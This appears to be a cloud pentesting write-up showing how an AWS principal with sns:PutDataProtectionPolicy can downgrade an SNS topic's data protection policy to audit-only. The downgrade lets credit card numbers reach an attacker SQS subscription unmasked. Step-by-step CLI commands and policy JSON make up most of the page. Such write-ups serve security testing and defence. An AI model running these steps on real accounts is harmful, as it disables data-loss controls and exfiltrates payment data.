AWS - SNS Message Data Protection Bypass via Policy Downgrade

Reading time: 4 minutes

If you have sns:PutDataProtectionPolicy on a topic, you can switch its Message Data Protection policy from Deidentify/Deny to Audit-only (or remove Outbound controls) so sensitive values (e.g., credit card numbers) are delivered unmodified to your subscription.

Requirements

• Permissions on the target topic to call sns:PutDataProtectionPolicy (and usually sns:Subscribe if you want to receive the data).
• Standard SNS topic (Message Data Protection supported).

Attack Steps

• Variables

  REGION=us-east-1
  

1. Create a standard topic and an attacker SQS queue, and allow only this topic to send to the queue

   TOPIC_ARN=$(aws sns create-topic --name ht-dlp-bypass-$(date +%s) --region $REGION --query TopicArn --output text)
   Q_URL=$(aws sqs create-queue --queue-name ht-dlp-exfil-$(date +%s) --region $REGION --query QueueUrl --output text)
   Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)
   
   aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes Policy=Version:2012-10-17
   

2. Attach a data protection policy that masks credit card numbers on outbound messages

   cat > /tmp/ht-dlp-policy.json <<'JSON'
   {
     "Name": "__ht_dlp_policy",
     "Version": "2021-06-01",
     "Statement": [{
       "Sid": "MaskCCOutbound",
       "Principal": ["*"],
       "DataDirection": "Outbound",
       "DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
       "Operation": { "Deidentify": { "MaskConfig": { "MaskWithCharacter": "#" } } }
     }]
   }
   JSON
   aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-policy.json)"
   

3. Subscribe attacker queue and publish a message with a test CC number, verify masking

   SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)
   aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message payment:{cc:4539894458086459}
   aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All
   

Expected excerpt shows masking (hashes):

"Message" : "payment:{cc:################}"

4. Downgrade the policy to audit-only (no deidentify/deny statements affecting Outbound)

For SNS, Audit statements must be Inbound. Replacing the policy with an Audit-only Inbound statement removes any Outbound de-identification, so messages flow unmodified to subscribers.

cat > /tmp/ht-dlp-audit-only.json <<'JSON'
{
  "Name": "__ht_dlp_policy",
  "Version": "2021-06-01",
  "Statement": [{
    "Sid": "AuditInbound",
    "Principal": ["*"],
    "DataDirection": "Inbound",
    "DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
    "Operation": { "Audit": { "SampleRate": 99, "NoFindingsDestination": {} } }
  }]
}
JSON
aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-audit-only.json)"

5. Publish the same message and verify the unmasked value is delivered

   aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message payment:{cc:4539894458086459}
   aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All
   

Expected excerpt shows cleartext CC:

4539894458086459

Impact

• Switching a topic from de-identification/deny to audit-only (or otherwise removing Outbound controls) allows PII/secrets to pass through unmodified to attacker-controlled subscriptions, enabling data exfiltration that would otherwise be masked or blocked.